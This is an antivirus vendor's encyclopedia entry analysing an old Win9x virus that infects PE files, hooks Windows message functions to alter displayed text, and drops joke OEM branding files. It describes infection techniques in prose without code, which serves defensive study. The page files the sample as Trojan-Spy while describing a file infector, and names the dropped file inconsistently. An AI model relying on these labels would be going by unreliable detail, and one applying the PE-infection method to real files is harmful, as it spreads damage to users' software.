Class
Trojan-Spy
Platform
Win9x

Parent class: TrojWare

Trojans are malicious programs that perform actions which are not authorized by the user: they delete, block, modify or copy data, and they disrupt the performance of computers or computer networks. Unlike viruses and worms, the threats that fall into this category are unable to make copies of themselves or self-replicate. Trojans are classified according to the type of action they perform on an infected computer.

Class: Trojan-Spy

Trojan-Spy programs are used to spy on a user’s actions (to track data entered by keyboard, make screen shots, retrieve a list of running applications, etc.) The harvested information is then transmitted to the malicious user controlling the Trojan. Email, FTP, the web (including data in a request) and other methods can be used to transmit the data.

Read more

Platform: Win9x

No platform description

Description

Technical Details

While infecting a PE EXE file the virus parses its internal file format, creates one more section at the end of the file and writes its encrypted text to there. The virus section is continued by the virus' Export table that is used by virus to link its code with necessary Windows API functions when an infected file is executed. Because the virus has its own Export table, it modifies the pointer to it in the PE header. The virus also pays special attention to original host file's Export table. To save it the virus moves necessary data from it to the file end and appends it to its own Export table. As a result when Windows loads infected files, it processes both virus and host Export tables.

To link its section with victim file body the virus modifies necessary fields in the PE header. The virus does that very accurate, and as a result in most of cases does not cause errors when infected files are loaded, ever under WinNT.

The virus detects already infected files by a stamp that is saved in file LastWrite date and time stamp. This ID value is not constant and depends on other fields of file's time&date (the virus Rol/Ror/Xor-es five of them to caclulate the ID).

Trigger routines

While installing memory resident the virus calls three of its trigger routines. First of them checks system environment and depending on it turns the virus to the "debug mode". The second one depending on the system time's seconds value displays the MessageBox:

The last one depending on the virus random counter (that depends on the system date and time), in one case of sixteen, drops the OEMINFO.INI and OEMLOGO.BMP files to the Windows system directory. The OEMLOGO.INI file contains the following text strings in two sections:

[General]
Manufacturer=TechnoRat
Model=Very large life zone for Harrier
[Support Information]
line1=Today the virus is not the virus,
line2=but the part of operating system. . .
line3=(C) by 95-th Harrier from DarkLand
line4=---
line5=The pretty LOGO picture was created
line6=by PolyGris and LionKing. Main idea
line7=and code of all versions was developed
line8=by me - TechnoRat
This BMP file and "General" sections are shown in "System Property" window when MyComputer/Properties is selected. The virus "Support Information" is displayed when corresponding button in the same "System Property" is pressed.

The virus "debug mode" is activated when the system environment contains a specific string ("Variable=Value", is set by "SET=" DOS instruction, for instance). This string has 19 symbols and is detected by the virus by using a silly CRC loop. This CRC loop "compresses" the string to four bytes, so there are several millions "readable" variants of this string.

When virus debug mode is on, it displays the message box:

The virus then on each infection displays a MessageBox and informs requests permission to infect a file, for example:

On "OK" the virus runs infection routine, on "Cancel" the virus displays one more MessageBox and exits:

As it is mentioned above, the USER32 and GDI32 hooks are used by virus in its trigger routine - the virus changes the texts that are displayed, or outputs its own messages.

When an infected application calls to WinHelpA function on the 16th time, the virus displays its own MessageBox instead of calling Windows function:

"95-th Harrier from DarkLand"
God will help! ;-)
On any MessageBoxA call the virus checks system time and depending on it replaces original text in MessageBox with one of six variants:

System malfunction!
VXDs rings overcrossed!
CPU mode thunking error!
CPU overclocked, cooler device emergency!
Help subsystem is damaged!
Attention! Bugs inside computer, use SoftIce.

On other hooked calls the virus scans the text for four variants of substrings and replaces them with its own versions:

MICROSOFT  -> MIcrOSOFT
WINDOWS    -> WINDOwS
BILL GATES -> Gill Bates
HARRIER    -> Oh! Guys! Is it about me?

Read more

Find out the statistics of the vulnerabilities spreading in your region on statistics.securelist.com

Found an inaccuracy in the description of this vulnerability? Let us know!
Kaspersky Next
Let’s go Next: redefine your business’s cybersecurity
Learn more
New Kaspersky!
Your digital life deserves complete protection!
Learn more
Confirm changes?
Your message has been sent successfully.